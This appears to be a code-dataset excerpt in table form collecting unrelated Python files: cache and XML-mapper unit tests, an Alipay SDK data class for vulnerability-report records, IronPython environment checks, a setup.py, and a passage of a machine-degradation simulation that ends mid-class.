id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
107428 | #!/usr/bin/env python
__author__ = '<NAME>'
from strongdict import StrongDict, memo, memo_until, nmemo
def test_simple():
    """Store and retrieve values of mixed key types from a StrongDict."""
    cache = StrongDict()
    cache['One'] = 1
    cache[2] = 2
    cache['Three'] = 'Three'
    assert cache['One'] == 1
    assert cache[2] == 2
    assert cache['One'] == 1  # earlier entry still present after more inserts
    assert cache['Three'] == 'Three'
def test_iteritems():
    """Iterating via iteritems() yields every stored key/value pair."""
    source = StrongDict()
    source['One'] = 1
    source[2] = 2
    source['Three'] = 'Three'
    # Materialise the iterator into a plain dict and compare.
    collected = dict(source.iteritems())
    expected = {2: 2, 'Three': 'Three', 'One': 1}
    assert collected == expected
def test_instantiation():
    """A StrongDict can be built from a plain dict or another StrongDict."""
    seed = {2: 2, 'Three': 'Three', 'One': 1}
    first = StrongDict(seed)
    assert str(seed) == str(first)
    second = StrongDict(first)
    assert str(first) == str(second)
def test_n_limit():
    """An entry-count-limited StrongDict evicts the oldest entries.

    With limit=3 only the three most recently inserted keys survive, and
    deleting a key that was already evicted raises KeyError, like a dict.
    """
    w = StrongDict(limit=3)
    for i in range(10):
        w[i] = i * i
    assert len(w) == 3      # only keys 7, 8, 9 remain
    assert 6 not in w       # key 6 was evicted by the size limit
    del w[8]
    assert len(w) == 2
    try:
        del w[6]
        assert False, 'deleting evicted key 6 must raise KeyError'
    except KeyError:
        # Expected: key 6 is no longer in the dictionary.
        pass
    del w[9]
    assert 9 not in w
    x = {}
    for i in range(4):
        w[i] = x[i] = i * i
    # Key 0 must have been evicted from w (limit=3), so drop it from x too.
    del x[0]
    assert w == x
def test_time_limit():
    """Entries of a time-limited StrongDict expire after tlimit seconds."""
    from time import sleep
    cache = StrongDict(tlimit=2)
    cache[1] = 'One'
    sleep(1)
    cache['Two'] = 2
    assert {1: 'One', 'Two': 2} == cache
    sleep(1)                      # entry for key 1 reaches its 2s limit
    cache['Three'] = 'Three'
    sleep(1)
    assert cache == {'Three': 'Three'}
    sleep(3)                      # everything expires
    assert len(cache) == 0
def test_retention():
    """Test that weak references forget objects deleted from the cache."""
    # NOTE: the docstring above was previously placed after the import,
    # where it was a no-op string statement rather than a docstring.
    import gc
    limit = 3
    w = StrongDict(limit=limit)
    n = 50
    for i in range(n):
        x = [1]
        w[i] = x
    x = None  # drop the last strong local reference
    assert limit == len(w)
    w.clear()
    assert 0 == len(w)
    # w.weak_len() could be non zero depending on garbage collection activity.
    assert w.weak_len() <= limit
    gc.collect()
    assert 0 == w.weak_len()
class TestMemoFlag(object):
    """Callable boolean flag used to detect whether a memoized body ran.

    Calling the instance sets the flag to the truthiness of the argument;
    comparing the instance with ``==`` reads the flag back.
    """

    def __init__(self):
        # Name-mangled attribute keeps the flag private to this helper.
        self.__flag = False

    def __call__(self, f):
        """Set the flag to the truthiness of *f*."""
        self.__flag = bool(f)

    def __eq__(self, f):
        """Compare the stored flag against *f* (normally True or False)."""
        return self.__flag == f
def test_memo():
    """
    Test @memo decorator.
    A memoized function body runs only for argument values not seen before;
    repeated arguments are answered from the cache.
    """
    tmf = TestMemoFlag()

    @memo
    def foo(x):
        tmf(True)  # runs only when x is seen for the first time
        return x

    foo(1)
    assert tmf == True
    tmf(False)
    foo(2)
    assert tmf == True
    tmf(False)
    foo(1)
    assert tmf == False  # 1 is cached, so the body must not run again
def test_memo_until():
    """
    Test @memo_until decorator.
    The memoized body runs for unseen argument values, and runs again for
    a cached value once the time limit has expired.
    """
    from time import sleep
    tmf = TestMemoFlag()

    @memo_until(tlimit=1)
    def foo(x):
        tmf(True)  # runs only when x is not currently cached
        return x

    foo(1)
    assert tmf == True
    tmf(False)
    foo(1)
    assert tmf == False   # still cached, body skipped
    sleep(2)              # let the 1-second cache entry expire
    tmf(False)
    foo(1)
    assert tmf == True    # expired entry forces re-execution
    tmf(False)
    foo(1)
    assert foo('size_elephant_cache') == 1
    foo('clear_elephant_cache')
    tmf(False)
    foo(1)
def test_nmemo():
    """
    Test @nmemo decorator (memoization with a bounded, 3-slot cache).
    """
    tmf = TestMemoFlag()

    @nmemo(3)
    def foo(x):
        tmf(True)  # runs only when x is absent from the bounded cache
        return x

    tmf(False)
    foo(1)
    assert tmf == True
    tmf(False)
    foo(2)
    assert tmf == True
    tmf(False)
    foo(1)
    assert tmf == False   # 1 is still cached
    # Push enough new values through to evict 1 from the 3-slot cache.
    for arg in (3, 4, 5, 6):
        tmf(False)
        foo(arg)
        assert tmf == True
    tmf(False)
    foo(1)
    assert tmf == True    # 1 was evicted, so the body runs again
    assert foo('size_elephant_cache') == 3
def test_clear():
    """Clearing the memo cache forces re-execution for cached arguments."""

    @memo
    def g(x):
        return x

    assert g(5) == 5
    assert g(5) == 5   # second call answered from the cache
    assert g(6) == 6
    g('clear_elephant_cache')
    assert g(5) == 5   # cache was cleared, body runs again
if __name__ == "__main__":
    # Command-line helper (Python 2): list the available nose tests and,
    # optionally, run a single named test method directly — handy when
    # stepping through a test under a debugger such as pdb.
    import sys
    usage = '''
Run one of the nose tests listed below using the command shown.
Run one of the nose test methods in a debugger by invoking this module with
the nose test method as the argument.
$ pdb test_strongdict.py test_simple
'''
    print usage
    # Print a ready-to-paste nosetests command for every test_* name.
    for i in dir():
        if i.startswith('test'):
            print 'nosetests -s', __file__ + ':' + i
    print
    if len(sys.argv) > 1:
        f_name = sys.argv[1]
        try:
            # Look the requested test up by name in the module globals.
            f = globals()[f_name]
            print 'About to run', f_name, '...'
            f()  # Set breakpoint here in debugger to step into given method.
        except KeyError:
            print 'Could not find named method.'
    else:
        print 'Usage:', __file__, '[method]'
| StarcoderdataPython |
49162 | from redesigned_barnacle.buffer import CircularBuffer
from redesigned_barnacle.graph import Sparkline
from redesigned_barnacle.mock import MockFramebuffer
from unittest import TestCase
class SparkTest(TestCase):
    """Smoke test for Sparkline rendering into a mock framebuffer."""

    def test_line(self):
        # Build a 32x64 sparkline backed by a circular sample buffer,
        # push one sample and draw it at the origin; the test passes if
        # no exception is raised.
        buf = CircularBuffer()
        sl = Sparkline(32, 64, buf)
        sl.push(16)
        sl.draw(MockFramebuffer(), 0, 0)
3366842 | <reponame>prathimacode-hub/PythonScripts
class Computer:
    """A computer described by its CPU model and amount of RAM."""

    def __init__(self, cpu, ram):
        """Store the hardware configuration on the instance."""
        self.ram = ram
        self.cpu = cpu

    def config(self):
        """Print this computer's configuration."""
        print("The Configuration", self.cpu, self.ram)
# Create two Computer instances and show their configurations.
HP = Computer("Intel", 8)  # instances
Dell = Computer("Intel1", 10)
print(id(HP))  # identity of the HP object
HP.config()
Dell.config()
| StarcoderdataPython |
3372225 | <filename>alipay/aop/api/domain/VulInfo.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
def _make_vul_property(name):
    """Build a read/write property proxying VulInfo field *name* to ``_name``."""
    attr = '_' + name

    def getter(self):
        return getattr(self, attr)

    def setter(self, value):
        setattr(self, attr, value)

    return property(getter, setter)


class VulInfo(object):
    """Vulnerability report record exchanged with the Alipay open API.

    Every public attribute is a plain read/write property backed by an
    underscore-prefixed slot initialised to None.  ``to_alipay_dict`` and
    ``from_alipay_dict`` convert between this object and the wire dict.
    The original generated code repeated an identical property pair and
    serialization stanza for all 22 fields; the field list below drives
    the same behavior without the duplication.
    """

    # Wire field names; dict keys and property names are identical, and
    # tuple order preserves the original dict insertion order.
    _FIELD_NAMES = (
        'attachment', 'business', 'coin', 'company', 'confirm_level',
        'confirm_time', 'detail', 'fix_time', 'level', 'mobile_phone',
        'name', 'nick', 'reject_reason', 'score', 'status', 'submit_time',
        'type_sub_first_id', 'type_sub_first_name', 'type_sub_second_id',
        'type_sub_second_name', 'url', 'vul_id',
    )

    def __init__(self):
        # Start every backing slot at None so the truthiness checks in
        # to_alipay_dict skip unset fields, matching the generated code.
        for field in self._FIELD_NAMES:
            setattr(self, '_' + field, None)

    def to_alipay_dict(self):
        """Return a dict of the truthy fields, recursing into nested models."""
        params = dict()
        for field in self._FIELD_NAMES:
            value = getattr(self, field)
            if value:
                if hasattr(value, 'to_alipay_dict'):
                    params[field] = value.to_alipay_dict()
                else:
                    params[field] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a VulInfo from a wire dict; return None for empty input."""
        if not d:
            return None
        o = VulInfo()
        for field in VulInfo._FIELD_NAMES:
            if field in d:
                setattr(o, field, d[field])
        return o


# Install the identical getter/setter property for every wire field.
for _field in VulInfo._FIELD_NAMES:
    setattr(VulInfo, _field, _make_vul_property(_field))
del _field
| StarcoderdataPython |
3354367 | import unittest
from lxml import etree
import should_be.all # noqa
import xmlmapper as mp
from xmlmapper import xml_helpers as xh
class SampleModel(mp.Model):
    """Minimal xmlmapper model: a <some_elem> root with a <name> child."""
    ROOT_ELEM = 'some_elem'
    name = mp.ROOT.name
class _TestDescBase(object):
    """Shared get/set/delete checks for xmlmapper descriptors.

    Subclasses' setUp must provide ``model``, ``elem``, ``desc``,
    ``target_value`` and ``alternate_value``.
    """

    def make_present(self):
        # Attach the prepared element so the descriptor's node exists.
        self.model._etree.append(self.elem)

    def test_get_exists(self):
        self.make_present()
        self.desc.__get__(self.model).should_be(self.target_value)

    def test_get_not_exists(self):
        # Missing node reads back as None.
        self.desc.__get__(self.model).should_be_none()

    def test_del_exists(self):
        self.make_present()
        self.desc.__delete__(self.model)

    def test_del_not_exists(self):
        # Deleting a missing node must raise AttributeError.
        self.desc.__delete__.should_raise(AttributeError, self.model)

    def test_set_exists(self):
        self.make_present()
        self.desc.__get__(self.model).should_be(self.target_value)
        self.desc.__set__(self.model, self.alternate_value)
        self.desc.__get__(self.model).should_be(self.alternate_value)

    def test_set_not_exists(self):
        # Setting through the descriptor creates the node on demand.
        self.desc.__set__(self.model, self.alternate_value)
        self.desc.__get__(self.model).should_be(self.alternate_value)
class TestCustomNodeValue(_TestDescBase, unittest.TestCase):
    """Descriptor with custom load/dump callables and attribute predicate."""

    def setUp(self):
        self.model = SampleModel()
        self.elem = etree.Element('name', lang='english')
        self.target_value = 'some name'
        self.alternate_value = 'some other name'
        self.elem.text = self.target_value
        # <name lang="english"> mapped through custom text load/dump hooks.
        self.desc = mp.ROOT.name['lang': 'english'] % mp.Custom(xh.load_text,
                                                                xh.dump_text)

    def test_loads(self):
        # A replaced _loads hook receives the element itself.
        self.model._etree.append(self.elem)
        self.desc._loads = lambda e: str(e.text) + '-hi'
        self.desc.__get__(self.model).should_be(self.target_value + '-hi')

    def test_dumps(self):
        # A replaced _dumps hook receives (value, element) and must return
        # the element to store.
        def set_text(v, e):
            e.text = v[:-3]
            return e
        self.desc._dumps = set_text
        self.desc.__set__(self.model, self.target_value + '-hi')
        elem = self.model._etree.find('name')
        elem.shouldnt_be_none()
        elem.text.should_be(self.target_value)

    def test_set_invalidates_cache(self):
        # Writing through the descriptor must refresh the cached value.
        self.model._cache = True
        self.desc._cached_vals[self.model] = 'cheese'
        self.desc.__set__(self.model, 'crackers')
        self.desc.__get__(self.model).should_be('crackers')
        self.desc._cached_vals[self.model].should_be('crackers')

    def test_get_cache_disabled(self):
        # With caching off, reads always hit the underlying tree.
        self.model._cache = False
        self.desc.__set__(self.model, 'cheese')
        self.desc.__get__(self.model).should_be('cheese')
        self.model._etree.find('name').text = 'crackers'
        self.desc.__get__(self.model).should_be('crackers')

    def test_get_cache_enabled(self):
        # With caching on, reads come from the cache, not the tree.
        self.model._cache = True
        self.desc._cached_vals[self.model] = 'cheese'
        self.desc.__get__(self.model).should_be('cheese')
class TestNodeValue(TestCustomNodeValue):
    """Plain node-text descriptor; reuses the custom-value test battery."""

    def setUp(self):
        self.model = SampleModel()
        self.elem = etree.Element('name')
        self.target_value = 'some value'
        self.alternate_value = 'some other value'
        self.elem.text = self.target_value
        self.desc = mp.ROOT.name

    def test_loads(self):
        # _raw_loads receives the raw text value (not the element).
        self.model._etree.append(self.elem)
        self.desc._raw_loads = lambda v: str(v) + '-hi'
        self.desc.__get__(self.model).should_be(self.target_value + '-hi')

    def test_dumps(self):
        # _dumps receives only the value for a plain node descriptor.
        self.desc._dumps = lambda v: v[:-3]
        self.desc.__set__(self.model, self.target_value + '-hi')
        elem = self.model._etree.find('name')
        elem.shouldnt_be_none()
        elem.text.should_be(self.target_value)
class TestAttributeValue(_TestDescBase, unittest.TestCase):
    """Descriptor bound to an element attribute (<cheese type="...">)."""

    def setUp(self):
        self.model = SampleModel()
        self.elem = etree.Element('cheese')
        self.target_value = 'cheddar'
        self.alternate_value = 'swiss'
        self.elem.set('type', 'cheddar')
        self.desc = mp.ROOT.cheese['type']
class TestNodeModelValue(_TestDescBase, unittest.TestCase):
    """Descriptor whose value is a nested xmlmapper model."""

    def setUp(self):
        # Local nested model: a <food> root with a <crackers> child.
        class OtherModel(mp.Model):
            ROOT_ELEM = 'food'
            crackers = mp.ROOT.crackers
        self.model = SampleModel()
        self.target_value = OtherModel()
        self.target_value.crackers = 'ritz'
        self.alternate_value = OtherModel()
        self.alternate_value.crackers = 'whole-grain'
        self.desc = mp.ROOT.food % OtherModel % {'always_present': False}
        # The element to attach is the nested model's own tree.
        self.elem = self.target_value._etree

    def test_always_present(self):
        # always_present descriptors materialise a value even when absent.
        self.desc._always_present = True
        self.desc.__get__(self.model).shouldnt_be_none()
class _TestNodeValueListViewBase(_TestDescBase):
    """Shared item-level checks for list-like xmlmapper descriptors.

    Subclasses provide ``item_elem_name`` and ``item_path`` in addition to
    the _TestDescBase fixtures.
    """

    @property
    def init_desc(self):
        # The live list view obtained through the descriptor.
        return self.desc.__get__(self.model)

    def make_item_present(self, content='', ind=1):
        # Insert one item element (with a name attribute) into the parent.
        item_elem = etree.Element(self.item_elem_name, name=content)
        self.elem.insert(ind, item_elem)

    def test_get_item_exists(self):
        self.make_present()
        self.make_item_present(self.alternate_value[0])
        self.init_desc[0].shouldnt_be_none()
        self.init_desc[0].should_be(self.alternate_value[0])

    def test_get_item_not_exists(self):
        self.make_present()
        # Indexing an empty list view raises IndexError.
        self.init_desc.__getitem__.should_raise(IndexError, 0)

    def test_set_item_exists(self):
        self.make_present()
        self.make_item_present(self.alternate_value[0])
        self.init_desc[0] = self.alternate_value[2]
        self.model._etree.findall(self.item_path).should_have_length(1)
        self.model._etree.find(self.item_path).get('name').should_be(
            self.alternate_value[2])

    def test_set_item_not_exists(self):
        self.make_present()
        # Assigning to index 0 of an empty view creates the item element.
        self.init_desc[0] = self.alternate_value[2]
        self.model._etree.findall(self.item_path).should_have_length(1)
        self.model._etree.find(self.item_path).get('name').should_be(
            self.alternate_value[2])

    def test_del_item_exists(self):
        self.make_present()
        self.make_item_present(self.alternate_value[0])
        del self.init_desc[0]
        self.model._etree.find(self.item_path).should_be_none()

    def test_del_item_not_exists(self):
        self.make_present()
        self.init_desc.pop.should_raise(IndexError, 0)
        self.model._etree.find(self.item_path).should_be_none()

    def test_always_present(self):
        # always_present list descriptors read back as an empty list.
        self.desc._always_present = True
        self.init_desc.should_be([])

    def test_len(self):
        self.make_present()
        self.make_item_present(self.alternate_value[0])
        self.make_item_present(self.alternate_value[1])
        len(self.desc.__get__(self.model)).should_be(2)
class TestNodeValueListView(_TestNodeValueListViewBase, unittest.TestCase):
    """List view filtered to <cracker> children of a mixed <food> parent.

    The parent also contains <cheese> elements that the view must ignore
    and preserve across set/delete operations.
    """

    def setUp(self):
        self.model = SampleModel()
        self.target_value = []
        self.alternate_value = ['ritz', 'triscuit', 'wheat thins']
        # View over food/cracker items, values stored in the name attribute.
        self.desc = mp.ROOT.food[...].cracker % (xh.attr_loader('name'),
                                                 xh.attr_dumper('name'))
        self.elem = etree.Element('food')
        self.item_elem_name = 'cracker'
        self.item_path = 'food/cracker'
        # Two sibling <cheese> elements the cracker view must not touch.
        self.elem.append(etree.Element('cheese', name='cheddar'))
        self.elem.append(etree.Element('cheese', name='swiss'))

    def test_partial_set(self):
        # full_replace=False updates the existing element in place instead
        # of replacing it, so attributes set by other descriptors survive.
        self.make_present()
        self.make_item_present(self.alternate_value[1])
        dumper = lambda v, e: e.set('like', v)
        other_desc = mp.ROOT.food[...].cracker % {'loads': xh.load_text,
                                                  'dumps': dumper,
                                                  'full_replace': False}
        other_init_desc = other_desc.__get__(self.model)
        other_init_desc[0] = 'shredded wheat'
        self.model._etree.findall(self.item_path).should_have_length(1)
        elem = self.model._etree.find(self.item_path)
        elem.get('like').should_be('shredded wheat')
        elem.get('name').should_be(self.alternate_value[1])

    def test_set_leaves_other_elems_behind(self):
        # Replacing the whole list only replaces cracker elements.
        self.make_present()
        self.make_item_present(self.alternate_value[0])
        self.make_item_present(self.alternate_value[1])
        food_elem = self.model._etree.find('food')
        len(food_elem).should_be(4)
        self.desc.__set__(self.model, ['wheat thins'])
        len(food_elem).should_be(3)
        food_elem[0].tag.should_be('cheese')
        food_elem[1].tag.should_be('cheese')
        food_elem[2].tag.should_be('cracker')
        food_elem[2].get('name').should_be('wheat thins')

    def test_delete_leaves_other_elems_behind(self):
        # Deleting the view removes crackers but keeps the cheeses.
        self.make_present()
        self.make_item_present(self.alternate_value[0])
        self.make_item_present(self.alternate_value[1])
        food_elem = self.model._etree.find('food')
        len(food_elem).should_be(4)
        self.desc.__delete__(self.model)
        len(food_elem).should_be(2)
        food_elem[0].tag.should_be('cheese')
        food_elem[1].tag.should_be('cheese')

    def test_set_item_exists(self):
        super(TestNodeValueListView, self).test_set_item_exists()
        self.model._etree.findall('food/cheese').shouldnt_be_empty()

    def test_set_item_not_exists(self):
        super(TestNodeValueListView, self).test_set_item_not_exists()
        self.model._etree.findall('food/cheese').shouldnt_be_empty()

    def test_del_item_exists(self):
        super(TestNodeValueListView, self).test_del_item_exists()
        self.model._etree.findall('food/cheese').shouldnt_be_empty()

    def test_del_item_not_exists(self):
        super(TestNodeValueListView, self).test_del_item_not_exists()
        self.model._etree.findall('food/cheese').shouldnt_be_empty()

    def test_insert(self):
        # Insertion respects view order, with non-view siblings interleaved.
        self.make_present()
        self.make_item_present(self.alternate_value[0])
        self.make_item_present(self.alternate_value[1], ind=3)
        self.init_desc.insert(1, self.alternate_value[2])
        self.model._etree.findall(self.item_path).should_have_length(3)
        list(self.init_desc).should_be([self.alternate_value[0],
                                        self.alternate_value[2],
                                        self.alternate_value[1]])
        elem = self.model._etree.find('food')[3]
        elem.tag.should_be('cracker')
        elem.get('name').should_be(self.alternate_value[2])

    def test_delete_pred_true_removes_elem(self):
        # A delete predicate returning True removes the element entirely.
        self.make_present()
        self.make_item_present(self.alternate_value[0])
        self.make_item_present(self.alternate_value[1])
        self.desc._delete_pred = lambda e: True
        del self.init_desc[0]
        len(self.model._etree.findall(self.item_path)).should_be(1)

    def test_delete_pred_false_keeps_elem(self):
        # A predicate returning False may mutate the element but keeps it.
        self.make_present()
        self.make_item_present(self.alternate_value[0])
        self.make_item_present(self.alternate_value[1])
        def del_pred(elem):
            elem.attrib.pop('name')
            return False
        self.desc._delete_pred = del_pred
        del self.init_desc[0]
        len(self.model._etree.findall(self.item_path)).should_be(2)
        self.model._etree.find(self.item_path).get('name',
                                                   None).should_be_none()
class TestNodeValueList(_TestNodeValueListViewBase, unittest.TestCase):
    """List descriptor over all children of <food> (stored as <cheese>)."""

    def setUp(self):
        self.model = SampleModel()
        self.target_value = []
        self.alternate_value = ['american', 'pepperjack', 'cheddar']
        # All children of food; items dumped as <cheese name="...">.
        self.desc = mp.ROOT.food[...] % (xh.attr_loader('name'),
                                         xh.attr_dumper('name', 'cheese'))
        self.elem = etree.Element('food')
        self.item_elem_name = 'cheese'
        self.item_path = 'food/cheese'

    # NOTE: a redundant make_present override that only called super() was
    # removed; the inherited _TestDescBase.make_present is used directly.

    def test_delete_removes_node(self):
        # Deleting the full list removes the <food> parent node itself.
        self.make_present()
        self.model._etree.find('food').shouldnt_be_none()
        self.desc.__delete__(self.model)
        self.model._etree.find('food').should_be_none()

    def test_insert(self):
        # Insertion respects list order within the parent element.
        self.make_present()
        self.make_item_present(self.alternate_value[0])
        self.make_item_present(self.alternate_value[1], ind=3)
        self.init_desc.insert(1, self.alternate_value[2])
        self.model._etree.findall(self.item_path).should_have_length(3)
        list(self.init_desc).should_be([self.alternate_value[0],
                                        self.alternate_value[2],
                                        self.alternate_value[1]])
| StarcoderdataPython |
1636151 | #####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Microsoft Public License. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Microsoft Public License, please send an email to
# <EMAIL>. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Microsoft Public License.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
import sys
from iptest.util import get_env_var, get_temp_dir
#------------------------------------------------------------------------------
#--IronPython or something else?
# Platform-detection flags used throughout the IronPython test framework.
is_silverlight = sys.platform == 'silverlight'
is_cli = sys.platform == 'cli'
is_ironpython = is_silverlight or is_cli
is_cpython = sys.platform == 'win32'
if is_ironpython:
    #We'll use System, if available, to figure out more info on the test
    #environment later
    import System
    import clr

#--The bittedness of the Python implementation
is_cli32, is_cli64 = False, False
if is_ironpython:
    is_cli32, is_cli64 = (System.IntPtr.Size == 4), (System.IntPtr.Size == 8)
is_32, is_64 = is_cli32, is_cli64
if not is_ironpython:
    # On CPython fall back to the OS environment to determine bitness.
    cpu = get_env_var("PROCESSOR_ARCHITECTURE")
    if cpu.lower()=="x86":
        is_32 = True
    elif cpu.lower()=="amd64":
        is_64 = True

#--CLR version we're running on (if any)
is_orcas = False
if is_cli:
    # Orcas (.NET 3.5) exposes 8 DynamicMethod constructor overloads.
    is_orcas = len(clr.GetClrType(System.Reflection.Emit.DynamicMethod).GetConstructors()) == 8
is_net40 = False
if is_cli:
    is_net40 = System.Environment.Version.Major==4
is_dlr_in_ndp = False
if is_net40:
    # On .NET 4, a failure to load Microsoft.Scripting.Core means the DLR
    # ships inside the framework itself.
    try:
        clr.AddReference("Microsoft.Scripting.Core")
    except:
        is_dlr_in_ndp = True

#--Newlines
if is_ironpython:
    newline = System.Environment.NewLine
else:
    import os
    newline = os.linesep

#--Build flavor of Python being tested
is_debug = False
if is_cli:
    is_debug = sys.exec_prefix.lower().endswith("debug")

#--Are we using peverify to check that all IL generated is valid?
is_peverify_run = False
if is_cli:
    is_peverify_run = is_debug and "-X:SaveAssemblies" in System.Environment.CommandLine

#--Internal checkin system used for IronPython
is_snap = False
if not is_silverlight and get_env_var("THISISSNAP")!=None:
    is_snap = True

#--We only run certain time consuming test cases in the stress lab
is_stress = False
if not is_silverlight and get_env_var("THISISSTRESS")!=None:
    is_stress = True

#--Are we running tests under the Vista operating system?
is_vista = False
if not is_silverlight and get_env_var("IS_VISTA")=="1":
    is_vista = True

is_win7 = False
if is_ironpython: #TODO - what about CPython?
    # Windows 7 reports OS version 6.1.
    is_win7 = System.Environment.OSVersion.Version.Major==6 and System.Environment.OSVersion.Version.Minor==1
#------------------------------------------------------------------------------
| StarcoderdataPython |
3219063 | <gh_stars>0
from distutils.core import setup
# Package metadata for PyGUIBox, published to PyPI via distutils.
setup(
    name = 'PyGUIBox',
    packages = ['pyguibox'],
    version = '0.3',
    license='MIT',
    description = 'A simple cross-platform tool for creating GUI message boxes.',
    author = '<NAME>',
    author_email = '<EMAIL>',
    url = 'https://github.com/matin-me/pyguibox',
    download_url = 'https://github.com/Matin-ME/PyGUIBox/archive/v_03.tar.gz',
    keywords = ['Message Box', 'GUI', 'Message', 'Alert', 'Input', 'MsgBox'],
    install_requires=[],  # no runtime dependencies
    classifiers=[
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3'
    ],
)
175214 | <gh_stars>0
import time
import numpy as np
import random
import math
from absl import logging
from .scenes import get_map_params
from functools import partial
import math
class Transition():
    """Markov transition model for machine health states.

    There are 4 health states: pre-mature, mature, slightly damaged and
    severely damaged.  ``T[action][state]`` is a probability row over the
    4 successor states.  With ``schedule=True`` the matrix is linearly
    annealed from a 0/1 mask of ``T`` toward ``T`` over ``length`` steps;
    exponential annealing (``exp=True``) is not implemented.

    Fixes over the original: ``return NotImplementedError`` (which in
    ``__init__`` even raised a spurious TypeError for returning non-None)
    is replaced with a proper ``raise``; dead commented-out code removed.
    """

    def __init__(self, tran_matrix, length=10, exp=False, schedule=False):
        self._init_matrix(tran_matrix)
        self.schedule = schedule
        self.length = length
        self.exp = exp
        if schedule:
            if self.exp:
                raise NotImplementedError('exponential schedules are not supported')
            # Start from a 0/1 mask of T and decay linearly toward T.
            self.init = np.ones_like(self.T)
            self.init[self.T == 0] = 0
            self.decay = (self.init - self.T) / length

    def _init_matrix(self, tran_matrix):
        """Store the transition tensor, shaped (actions, states, states)."""
        self.T = tran_matrix

    def transit(self, init_state, action, steps=None):
        """Sample the next health state for (init_state, action).

        steps: per-state step counters, used only when schedule=True to
        anneal the transition matrix before sampling.
        """
        if not self.schedule:
            p = self.T[action][init_state]
            return np.random.choice(4, 1, p=p)[0]
        if self.exp:
            raise NotImplementedError('exponential schedules are not supported')
        # Anneal toward T by the steps spent in each state, then
        # renormalise the selected row before sampling.
        annealed = self.init - self.decay * np.array(steps)
        p = annealed[action][init_state]
        p /= np.sum(p)
        return np.random.choice(4, 1, p=p)[0]
class Continue_Transition():
    """Continuous-time health-state transitions driven by sojourn times.

    Each health state s gets a random sojourn duration drawn from the
    configured distribution (parameters first_params[s]/second_params[s],
    floored at lower_bounds[s]).  The remaining duration is tracked in
    ``self.end_time`` and decremented by transit() each step.
    """

    def __init__(self, dist, first_params, second_params, lower_bounds):
        # dist selects the sojourn-time distribution by name.
        assert type(dist) == str, "dist must be string"
        self.dist_name = dist
        self.first_params = first_params
        self.second_params = second_params
        self.lower_bounds = lower_bounds
        if dist == 'log-normal':
            self.dist = np.random.lognormal
        elif dist == 'exponential':
            self.dist = np.random.exponential
        elif dist == 'gamma':
            self.dist = np.random.gamma
        elif dist == 'static':
            # Fixed (deterministic) sojourn time; no sampler needed.
            self.dist = None
        else:
            raise ValueError("{} is not a predefined distributions, which has to be in [log-normal, exponential, gamma]".format(dist))

    def init_trans(self, init_state):
        """Sample a sojourn time for *init_state* and return the number of
        steps already spent in it (chosen uniformly at random); the
        remainder is stored in ``self.end_time``."""
        first_param = self.first_params[init_state]
        second_param = self.second_params[init_state]
        lower_bound = self.lower_bounds[init_state]
        if self.dist_name == 'log-normal':
            mean = first_param
            sigma = second_param
            self.end_time = max(lower_bound, math.ceil(self.dist(mean, sigma)))
        elif self.dist_name == 'exponential':
            # first_param acts as a fixed offset added to the sample.
            offset = first_param
            scale = second_param
            self.end_time = max(lower_bound, math.ceil(offset + self.dist(scale)))
        elif self.dist_name == 'gamma':
            shape = first_param
            scale = second_param
            self.end_time = max(lower_bound, math.ceil(self.dist(shape, scale)))
        elif self.dist_name == 'static':
            shape = first_param
            scale = second_param
            self.end_time = first_param
        else:
            raise ValueError("{} is not a predefined distributions, which has to be in [log-normal, exponential, gamma]".format(self.dist_name))
        steps = random.randint(0, self.end_time-1)
        self.end_time -= steps
        return steps

    def transit(self, init_state, action, steps=None):
        """Advance one step; return the (possibly unchanged) health state.

        steps: per-state step counters; steps[init_state] == 1 marks the
        first step in the current state, which triggers sampling a fresh
        sojourn duration.  State 3 (severely damaged) resets to state 0.
        """
        if steps[init_state] == 0:
            raise ValueError("wrong steps!")
        if init_state != 3:
            if steps[init_state] == 1:
                # First step in this state: draw a new sojourn duration.
                first_param = self.first_params[init_state]
                second_param = self.second_params[init_state]
                lower_bound = self.lower_bounds[init_state]
                if self.dist_name == 'log-normal':
                    mean = first_param
                    sigma = second_param
                    self.end_time = max(lower_bound, math.ceil(self.dist(mean, sigma)))
                elif self.dist_name == 'exponential':
                    offset = first_param
                    scale = second_param
                    self.end_time = max(lower_bound, math.ceil(offset + self.dist(scale)))
                elif self.dist_name == 'gamma':
                    shape = first_param
                    scale = second_param
                    self.end_time = max(lower_bound, math.ceil(self.dist(shape, scale)))
                elif self.dist_name == 'static':
                    shape = first_param
                    self.end_time = first_param
                else:
                    raise ValueError("{} is not a predefined distributions, which has to be in [log-normal, exponential, gamma]".format(self.dist_name))
            # NOTE(review): action 1 appears to slow degradation (0.75 per
            # step instead of 1) — confirm against the environment's
            # action semantics.
            if action != 1:
                self.end_time -= 1
            else:
                self.end_time -= .75
            if self.end_time <= 0:
                # Sojourn over: degrade to the next state (wrapping 4 -> 1).
                init_state += 1
                if init_state > 3:
                    init_state %= 3
        else:
            # Severely damaged machines come back as good-as-new.
            init_state = 0
        return init_state
# Default action table; values are consumed by Machine via config['actions'].
# NOTE(review): 0 presumably means "produce a 1000-part batch", 1 "idle",
# and 2 a maintenance duration (mean 12, spread 3) — confirm against the
# scene configs in get_map_params.
ACTION = {0: 1000,
          1: 0,
          2: (12, 3)}
class Machine():
    """A single machine on the production line.

    Health degrades through states 0 -> 1 -> 2 -> 3 (3 = broken), driven by
    the transition model ``T``.  Each step the machine requests parts for
    its chosen action; ``proceed()`` settles jobs and maintenance.
    """
    def __init__(self, id, T, cell_id, config, time_base=False):
        self.T = T                        # health-state transition model
        self.id = id
        self.cell_id = cell_id            # index of the owning Cell
        self.under_m = False              # True while under maintenance
        self.deque = 0                    # jobs finished in the last step
        self.anti_jobs = 0                # jobs currently held by this machine
        self.action = None                # last action taken (0/1/2)
        self.m_cd = 0                     # remaining maintenance cool-down steps
        self.ACTION = config['actions']   # action id -> parts requested per step
        self.COST = config['costs']       # per-action costs; COST[-1] = breakdown penalty
        self.restart = 0                  # number of completed repair cycles
        self.h_tracker = [[],[],[],[]]    # observed dwell times per health state
        self.init_time_base = time_base   # optional fixed work budget between services
        if time_base:
